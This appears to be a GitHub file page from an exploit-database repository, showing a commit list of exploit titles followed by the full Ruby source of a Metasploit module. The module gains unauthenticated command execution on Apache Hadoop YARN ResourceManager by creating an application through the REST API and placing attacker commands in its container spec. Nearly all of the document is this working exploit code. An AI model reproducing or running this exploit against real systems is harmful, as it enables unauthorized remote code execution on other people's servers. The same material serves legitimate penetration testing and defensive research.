b374aca9a3
10 changes to exploits/shellcodes G DATA Total Security 25.4.0.3 - Activex Buffer Overflow Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit) HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit) HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit) IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit) IBM QRadar SIEM - Remote Code Execution (Metasploit) Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit) Apache CouchDB - Arbitrary Command Execution (Metasploit) phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit) Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit) Dolibarr 3.2.0 < Alpha - File Inclusion Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion Dolibarr ERP/CRM - OS Command Injection Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection Dolibarr CMS 3.5.3 - Multiple Vulnerabilities Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities Dolibarr 7.0.0 - SQL Injection Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection Dolibarr ERP CRM < 7.0.3 - PHP Code Injection Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution WAGO e!DISPLAY 7300T - Multiple Vulnerabilities QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
92 lines
No EOL
2.7 KiB
Ruby
Executable file
92 lines
No EOL
2.7 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Exploit::CmdStager
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Hadoop YARN ResourceManager Unauthenticated Command Execution',
|
|
'Description' => %q{
|
|
This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'cbmixx', # Proof of concept
|
|
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
|
|
],
|
|
'References' =>
|
|
[
|
|
['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
|
|
['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
|
|
],
|
|
'Platform' => 'linux',
|
|
'Arch' => [ARCH_X86, ARCH_X64],
|
|
'Targets' =>
|
|
[
|
|
['Automatic', {}]
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => 'Oct 19 2016',
|
|
'DefaultTarget' => 0
|
|
))
|
|
|
|
register_options([Opt::RPORT(8088)])
|
|
end
|
|
|
|
def check
|
|
begin
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
|
'method' => 'POST'
|
|
)
|
|
rescue Rex::ConnectionError
|
|
vprint_error("#{peer} - Connection failed")
|
|
return CheckCode::Unknown
|
|
end
|
|
|
|
if res && res.code == 200 && res.body.include?('application-id')
|
|
return CheckCode::Detected
|
|
end
|
|
|
|
CheckCode::Safe
|
|
end
|
|
|
|
def exploit
|
|
print_status('Sending Command')
|
|
execute_cmdstager
|
|
end
|
|
|
|
def execute_command(cmd, opts = {})
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
|
|
'method' => 'POST'
|
|
)
|
|
|
|
app_id = res.get_json_document['application-id']
|
|
|
|
post = {
|
|
'application-id' => app_id,
|
|
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
|
|
'application-type' => 'YARN',
|
|
'am-container-spec' => {
|
|
'commands' => {'command' => cmd.to_s}
|
|
}
|
|
}
|
|
|
|
send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
|
|
'method' => 'POST',
|
|
'ctype' => 'application/json',
|
|
'data' => post.to_json
|
|
)
|
|
end
|
|
|
|
end |